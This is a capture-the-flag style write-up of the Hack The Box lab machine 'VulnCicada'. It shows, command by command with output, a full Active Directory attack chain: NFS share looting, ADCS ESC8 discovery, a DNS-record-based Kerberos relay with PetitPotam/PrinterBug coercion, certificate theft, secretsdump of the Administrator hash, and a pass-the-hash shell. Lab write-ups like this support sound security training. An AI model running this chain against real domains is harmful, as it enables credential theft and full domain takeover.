Nmap
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ nmap -sC -sV -Pn 10.129.234.48 -oN ./nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-07 21:30 UTC
Nmap scan report for 10.129.234.48
Host is up (0.27s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-07 10:32:04Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2025-10-07T10:22:15
|_Not valid after: 2026-10-07T10:22:15
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2025-10-07T10:22:15
|_Not valid after: 2026-10-07T10:22:15
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2025-10-07T10:22:15
|_Not valid after: 2026-10-07T10:22:15
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2025-10-07T10:22:15
|_Not valid after: 2026-10-07T10:22:15
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-10-07T10:33:50+00:00; -10h59m01s from scanner time.
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Not valid before: 2025-10-06T10:29:56
|_Not valid after: 2026-04-07T10:29:56
Service Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -10h59m03s, deviation: 2s, median: -10h59m05s
| smb2-time:
| date: 2025-10-07T10:33:07
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.82 seconds
Add DC-JPQ225.cicada.vlto our /etc/hosts
SMB - 445
I will start with guest user to auth SMB service
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ netexec smb cicada.vl -u guest -p ""
SMB 10.129.234.48 445 10.129.234.48 [*] x64 (name:10.129.234.48) (domain:10.129.234.48) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.129.234.48 445 10.129.234.48 [-] 10.129.234.48\guest: STATUS_NOT_SUPPORTED
NTLM auth is disabled, I would try to use Kerberos
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ netexec smb cicada.vl -u guest -p "" -k
SMB cicada.vl 445 cicada [*] x64 (name:cicada) (domain:vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB cicada.vl 445 cicada [-] vl\guest: [Errno Connection error (VL:88)] [Errno -2] Name or service not known
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ netexec smb cicada.vl -u wither -p "" -k
SMB cicada.vl 445 cicada [*] x64 (name:cicada) (domain:vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB cicada.vl 445 cicada [-] vl\wither: [Errno Connection error (VL:88)] [Errno -2] Name or service not known
There is nothing interesting left.
NFS - 2049
There is a public NFS share on VulnCicada:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ showmount -e 10.129.234.48
Export list for 10.129.234.48:
/profiles (everyone)
I would mount the share to /mnt on my local machine
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ sudo mount -t nfs -o rw 10.129.234.48:/profiles /mnt
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ ls /mnt
Administrator Daniel.Marshall Debra.Wright Jane.Carter Jordan.Francis Joyce.Andrews Katie.Ward Megan.Simpson Richard.Gibbons Rosie.Powell Shirley.West
It looks like it’s probably the C:\Users directory.
The public user has access to all of these directories (most are empty)
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ find /mnt -ls
1407374883623611 4 drwxrwxrwx 2 nobody nogroup 4096 Jun 3 10:21 /mnt
2533274790396733 1 drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 /mnt/Administrator
1688849860264767 1 drwx------ 2 nobody nogroup 64 Sep 15 2024 /mnt/Administrator/Documents
find: ‘/mnt/Administrator/Documents’: Permission denied
1688849860264783 1456 -rwxrwxrwx 1 nobody nogroup 1490573 Sep 13 2024 /mnt/Administrator/vacation.png
844424930132659 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Daniel.Marshall
844424930132661 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Debra.Wright
1125899906843319 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Jane.Carter
844424930132665 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Jordan.Francis
844424930132667 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Joyce.Andrews
844424930132669 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Katie.Ward
1125899906843329 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Megan.Simpson
844424930132675 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Richard.Gibbons
562949953422027 1 drwxrwxrwx 2 nobody nogroup 64 Sep 15 2024 /mnt/Rosie.Powell
5066549580792907 1 drwx------ 2 nobody nogroup 64 Sep 15 2024 /mnt/Rosie.Powell/Documents
find: ‘/mnt/Rosie.Powell/Documents’: Permission denied
2251799813708883 1792 -rwx------ 1 nobody nogroup 1832505 Sep 13 2024 /mnt/Rosie.Powell/marketing.png
562949953422029 1 drwxrwxrwx 2 nobody nogroup 64 Sep 13 2024 /mnt/Shirley.West
vacation.png
marketing.png
We can find a password from the second picture.
Auth as Rosie.Powell
Now we can use this credit to check the smb service
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k --shares
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] Enumerated shares
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 Share Permissions Remark
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 ----- ----------- ------
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 ADMIN$ Remote Admin
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 C$ Default share
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 CertEnroll READ Active Directory Certificate Services share
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 IPC$ READ Remote IPC
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 NETLOGON READ Logon server share
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 profiles$ READ,WRITE
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 SYSVOL READ Logon server share
I’ll get a TGT as Rosie.Powellusing netexec
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ getTGT.py CICADA/Rosie.Powell -dc-ip 10.129.234.48
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Saving ticket in Rosie.Powell.ccache
Then we can use this cache to connect the SMB service
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ KRB5CCNAME=Rosie.Powell.ccache
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ smbclient.py -k DC-JPQ225.cicada.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
ADMIN$
C$
CertEnroll
IPC$
NETLOGON
profiles$
SYSVOL
CertEnroll has a bunch of certificates:
# use CertEnroll
# ls
drw-rw-rw- 0 Mon Jun 16 20:41:25 2025 .
drw-rw-rw- 0 Fri Sep 13 15:17:59 2024 ..
-rw-rw-rw- 741 Mon Jun 16 20:36:08 2025 cicada-DC-JPQ225-CA(1)+.crl
-rw-rw-rw- 941 Mon Jun 16 20:36:08 2025 cicada-DC-JPQ225-CA(1).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(10)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(10).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(11)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(11).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(12)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(12).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(13)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(13).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(14)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(14).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(15)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(15).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(16)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(16).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(17)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(17).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(18)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(18).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(19)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(19).crl
-rw-rw-rw- 741 Mon Jun 16 20:36:08 2025 cicada-DC-JPQ225-CA(2)+.crl
-rw-rw-rw- 941 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(2).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(20)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(20).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(21)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(21).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(22)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(22).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(23)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(23).crl
-rw-rw-rw- 742 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(24)+.crl
-rw-rw-rw- 943 Mon Jun 16 20:36:07 2025 cicada-DC-JPQ225-CA(24).crl
These are public keys, and not sensitive.
Given the ADCS activity, I would use certipy-adto check the vulnerable template
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ certipy-ad find -target DC-JPQ225.cicada.vl -u Rosie.Powell@cicada.vl -p Cicada123 -k -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: DC-JPQ225.cicada.vl.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'cicada-DC-JPQ225-CA' via RRP
[*] Successfully retrieved CA configuration for 'cicada-DC-JPQ225-CA'
[*] Checking web enrollment for CA 'cicada-DC-JPQ225-CA' @ 'DC-JPQ225.cicada.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : cicada-DC-JPQ225-CA
DNS Name : DC-JPQ225.cicada.vl
Certificate Subject : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
Certificate Serial Number : 69D1087A9A5CEE8F42039744340508EC
Certificate Validity Start : 2025-10-07 10:25:57+00:00
Certificate Validity End : 2525-10-07 10:35:57+00:00
Web Enrollment
HTTP
Enabled : True
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : CICADA.VL\Administrators
Access Rights
ManageCa : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
ManageCertificates : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
Enroll : CICADA.VL\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled over HTTP.
Certificate Templates : [!] Could not find any certificate templates
It finds that the CA itself is vulnerable to ESC8.
The Certipy Wiki describes ESC8 as:
ESC8 describes a privilege escalation vector where an attacker performs an NTLM relay attack against an AD CS HTTP-based enrollment endpoint. These web-based interfaces provide alternative methods for users and computers to request certificates.
Let's exploit it step by step
1. Coerce Authentication: The attacker coerces a privileged account to authenticate to a machine controlled by the attacker using NTLM. Common targets for coercion include Domain Controller machine accounts (e.g., using tools like PetitPotam or Coercer, or other RPC-based coercion techniques against MS-EFSRPC, MS-RPRN, etc.) or Domain Admin user accounts (e.g., via phishing or other social engineering that triggers an NTLM authentication).
2. Set up NTLM Relay: The attacker uses an NTLM relay tool, such as Certipy’s relay command, listening for incoming NTLM authentications.
Relay Authentication: When the victim account authenticates to the attacker’s machine, Certipy captures this incoming NTLM authentication attempt and forwards (relays) it to the vulnerable AD CS HTTP web enrollment endpoint (e.g., https://<ca_server>/certsrv/certfnsh.asp).
3. Impersonate and Request Certificate: The AD CS web service, receiving what it believes to be a legitimate NTLM authentication from the relayed privileged account, processes subsequent enrollment requests from Certipy as that privileged account. Certipy then requests a certificate, typically specifying a template for which the relayed privileged account has enrollment rights (e.g., the “DomainController” template if a DC machine account is relayed, or the default “User” template for a user account).
4. Obtain Certificate: The CA issues the certificate. Certipy, acting as the intermediary, receives this certificate.
5. Use Certificate for Privileged Access: The attacker can now use this certificate (e.g., in a .pfx file) with certipy auth to authenticate as the impersonated privileged account via Kerberos PKINIT, potentially leading to full domain compromise.
First, create a Windows virtual machine and join it to the domain. The MachineAccountQuota is set to 10 (the default value).
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ netexec ldap DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M maq
LDAP DC-JPQ225.cicada.vl 389 DC-JPQ225 [*] None (name:DC-JPQ225) (domain:cicada.vl)
LDAP DC-JPQ225.cicada.vl 389 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
MAQ DC-JPQ225.cicada.vl 389 DC-JPQ225 [*] Getting the MachineAccountQuota
MAQ DC-JPQ225.cicada.vl 389 DC-JPQ225 MachineAccountQuota: 10
The record structure to add is <host><empty CREDENTIAL_TARGET_INFOMATION structure> , which in this case is DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA .
I'll use bloodyAD to set up the DNS record:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.28
[+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
I’ll start certipy-ad relay targeting the ADCS webserver, and it listens on SMB:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ certipy-ad relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
The netexec module coerce_plus will check several different methods to force authentication from a machine account:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, DFSCoerce
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PetitPotam
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, MSEven
At the relay, there’s a connection, and it eventually creates a .pfx file:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ certipy-ad relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
[*] SMBD-Thread-2 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Authenticating against http://dc-jpq225.cicada.vl as / SUCCEED
[*] Requesting certificate for '\\' based on the template 'DomainController'
[*] HTTP Request: POST http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Certificate issued with request ID 95
[*] Retrieving certificate for request ID: 95
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certnew.cer?ReqID=95 "HTTP/1.1 200 OK"
[*] Got certificate with DNS Host Name 'DC-JPQ225.cicada.vl'
[*] Certificate object SID is 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Saving certificate and private key to 'dc-jpq225.pfx'
[*] Wrote certificate and private key to 'dc-jpq225.pfx'
[*] Exiting...
With the certificate I can authenticate as the computer account:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ certipy-ad auth -pfx dc-jpq225.pfx -dc-ip 10.129.234.48
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
This TGT can be used to dump hashes from the DC:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ KRB5CCNAME=dc-jpq225.ccache secretsdump.py -k -no-pass cicada.vl/dc-jpq225\$@dc-jpq225.cicada.vl -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85a0da53871a9d56b6cd05deda3a5e87:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f9181ec2240a0d172816f3b5a185b6e3e0ba773eae2c93a581d9415347153e1a
Administrator:aes128-cts-hmac-sha1-96:926e5da4d5cd0be6e1cea21769bb35a4
Administrator:des-cbc-md5:fd2a29621f3e7604
[*] Cleaning up...
Now we can use this hash to get the administrator shell
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/VulnCicada]
└─$ wmiexec.py cicada.vl/administrator@dc-jpq225.cicada.vl -k -hashes :85a0da53871a9d56b6cd05deda3a5e87
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
Description
VulnCicada is a mid-level Windows AD machine: after discovering an image with a hidden password in a public share, it used that password to identify a vulnerability that could be exploited by ESC8, which used Kerberos relay to bypass self-relay restrictions, obtain machine account credentials, and then export the Administrator hash and take over the entire domain.